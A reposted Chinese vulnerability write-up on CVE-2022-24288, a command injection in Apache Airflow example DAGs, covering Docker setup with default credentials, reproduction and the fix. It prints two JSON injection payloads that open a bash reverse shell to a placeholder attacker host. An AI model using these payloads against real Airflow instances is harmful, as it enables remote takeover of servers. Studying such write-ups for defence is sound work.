首页 安全文摘 漏洞分析 正文

CVE-2022-24288:Apache Airflow OS命令注入漏洞

0x01 简介Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。0x02 漏洞概述Apache Airflow 存在操作系统命令注入漏洞,该漏洞的存在是由于某些示例dag中不正确的输入验证。远程未经身份验证的攻击者可利用该漏洞可以传递专门制作的HTTP请求,并在目标

0x01 简介

Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。

0x02 漏洞概述

Apache Airflow  存在操作系统命令注入漏洞,该漏洞的存在是由于某些示例dag中不正确的输入验证。远程未经身份验证的攻击者可利用该漏洞可以传递专门制作的HTTP请求,并在目标系统上执行任意操作系统命令。该漏洞允许远程攻击者可利用该漏洞在目标系统上执行任意shell命令。


0x03 影响版本

Apache Airflow < 2.2.4


0x04 环境搭建

使用docker搭建存在漏洞的系统版本

获取yaml文档

curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.2.3/docker-compose.yaml'

vim docker-compose.yaml

把这两个参数改成下面的,选择postgres的latest版本,privileged=true就是提升权限

image: postgres:latest

privileged: true(没有就加一个)

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第1张

然后wq保存

在这里你用docker-compose config -q会有一个警告的,为了不报这个警告官网也推荐了以下这个方式

mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env

直接执行即可

初始化

docker-compose up airflow-init

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第2张

docker-compose后台启动airflow

docker-compose -f docker-compose.yaml up -d

启动完成,浏览器打开ip:8080端口

用户名:airflow

密码:airflow


CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第3张

登陆,环境搭建完成

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第4张

0x05 漏洞复现

参考漏洞提交者的文章

https://hackerone.com/reports/1492896

两处RCE均为后台漏洞(需要配合未授权或者默认口令漏洞进行利用)

第一处:

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第5张

开启监听

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第6张

反弹shell

{"foo":"\";bash -i >& /dev/tcp/xx.xx.xx.xx/8881 0>&1;\""}

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第7张

反弹成功

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第8张

第二处:

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第9张

开启监听

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第10张

{"my_param":"\";bash -i >& /dev/tcp/xx.xx.xx.xx/8881 0>&1;\""}

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第11张

反弹成功

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第12张

0x06 修复方式

1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

http://seclists.org/oss-sec/2022/q1/160

2、删除或禁用默认DAG(可自行删除或在配置文件中禁用默认DAGload_examples=False)

原文由:Timeline Sec

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/242.html

相关推荐

Thinkphp漏洞复现总结

Thinkphp漏洞复现总结

Thinkphp简介ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发...

漏洞分析 2021-08-28 1 20778

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持